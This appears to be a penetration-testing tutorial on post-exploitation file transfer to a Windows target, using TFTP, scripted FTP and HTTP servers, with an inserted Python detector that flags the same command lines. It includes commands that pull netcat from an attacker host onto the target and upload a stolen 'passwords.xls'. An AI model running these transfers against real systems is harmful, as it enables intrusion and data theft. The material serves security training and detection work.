After we have gained a foothold on our target (exploitation), we want to upload and download files.
In our first stage we are limited to what the exploited target offers.
Some examples are:
- ftp (sftp / ftps)
- wget (http)
- bits (windows)
- custom scripts that make use of the available script interpreters:
  - PowerShell (windows)
  - Visual Basic (windows)
Create the tftp directory on our attacking host.
Start the tftp server.
Copy the nc binary to the tftp root.
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
Verify if tftp client is available on our target windows host:
C:\WINDOWS\system32>tftp
tftp

Transfers files to and from a remote computer running the TFTP service.

TFTP [-i] host [GET | PUT] source [destination]

  -i              Specifies binary image transfer mode (also called
                  octet). In binary image mode the file is moved
                  literally, byte by byte. Use this mode when
                  transferring binary files.
  host            Specifies the local or remote host.
  GET             Transfers the file destination on the remote host to
                  the file source on the local host.
  PUT             Transfers the file source on the local host to
                  the file destination on the remote host.
  source          Specifies the file to transfer.
  destination     Specifies where to transfer the file.
Download nc.exe via tftp on Windows platform
tftp -i <ipaddress of tftpserver> get nc.exe
Upload file from target to our tftp server:
tftp -i <ipaddress of tftpserver> put passwords.xls
Start FTP server on our attacking host (kali)
Installation and configuration of pure-ftp can be found here.
FTP on target
If we have FTP running on our target we can upload files via this service.
FTP client on target
If we have an FTP client on our target we can use it to download files from our attacking host.
On Windows we check if ftp.exe is available:
C:\WINDOWS\system32>dir ftp.*
dir ftp.*
 Volume in drive C has no label.
 Volume Serial Number is 50C3-3741

 Directory of C:\WINDOWS\system32

08/30/2002  02:00 PM            40,448 ftp.exe
08/30/2002  02:00 PM             6,179 ftp.mib
               2 File(s)         46,627 bytes
               0 Dir(s)   1,662,689,280 bytes free
If ftp.exe is available we have to create an input file with the ftp commands to execute.
(we can't run ftp.exe interactively)
echo open 10.10.10.10 21> ftp.txt
echo USER username>> ftp.txt
echo password>> ftp.txt
echo bin>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt
Run ftp.exe with inputfile
ftp -n -s:ftp.txt
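The tftp and scripted ftp transfers above leave distinctive command lines, which is what a defender can alert on. The following detector is an added example, not part of the original page: it assumes process command-line logging is enabled on the Windows hosts and that events have been reduced to (host, command line) pairs in time order; the host names WS01-WS03 and all sample events are constructed.

```python
import re
from collections import defaultdict

# Patterns taken from the commands on this page (tftp -i ... get/put, ftp -s:file,
# and the echo lines that build the ftp command file).
TFTP = re.compile(r'\btftp(?:\.exe)?"?\s+-i\s+(\S+)\s+(get|put)\s+(\S+)', re.I)
FTP_SCRIPT = re.compile(r'\bftp(?:\.exe)?"?\s+(?:-\w+\s+)*-s:(\S+)', re.I)
ECHO_FTP = re.compile(r'\becho\s+(?:open|user|bin|get|put|bye)\b[^>]*>>?\s*(\S+)', re.I)

def detect(events):
    """events: iterable of (host, command_line) in time order. Returns alert dicts."""
    alerts = []
    staged = defaultdict(set)  # host -> files that echo wrote FTP commands into
    for host, cmd in events:
        if m := TFTP.search(cmd):
            server, verb, name = m.groups()
            rule = "tftp_download" if verb.lower() == "get" else "tftp_upload"
            alerts.append({"host": host, "rule": rule, "peer": server, "file": name})
        elif m := ECHO_FTP.search(cmd):
            staged[host].add(m.group(1).lower())  # remember only; alert on use
        elif m := FTP_SCRIPT.search(cmd):
            script = m.group(1).lower()
            # A command file assembled with echo beforehand is the stronger signal.
            rule = "ftp_script_built_with_echo" if script in staged[host] else "ftp_script"
            alerts.append({"host": host, "rule": rule, "peer": None, "file": script})
    return alerts

# Constructed sample events (not real logs); hosts WS01-WS03 are made up.
SAMPLE_EVENTS = [
    ("WS01", r"cmd.exe /c tftp -i 10.10.10.10 get nc.exe"),
    ("WS01", r"cmd.exe /c tftp -i 10.10.10.10 put passwords.xls"),
    ("WS02", r"cmd.exe /c echo open 10.10.10.10 21> ftp.txt"),
    ("WS02", r"cmd.exe /c echo USER username>> ftp.txt"),
    ("WS02", r"cmd.exe /c echo password>> ftp.txt"),
    ("WS02", r"cmd.exe /c echo GET nc.exe>> ftp.txt"),
    ("WS02", r"C:\WINDOWS\system32\ftp.exe -n -s:ftp.txt"),
    ("WS03", r"ftp.exe -s:nightly_backup.txt"),
    ("WS03", r"ping 10.10.10.10"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The plain `ftp_script` rule also fires on legitimate scheduled jobs, so it is best treated as low severity unless the command file was staged with echo on the same host.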
Start HTTP server on our attacking host (kali)
We can start an HTTP server that serves files to be downloaded by our target.
Start apache on kali
service apache2 start
Start python simplehttp server in the directory with the files you want to serve.
python -m SimpleHTTPServer 80
HTTP client on our target
On most Linux hosts we have wget and curl available to download files via http.
On Windows hosts we can use PowerShell or VBScript to download files via http.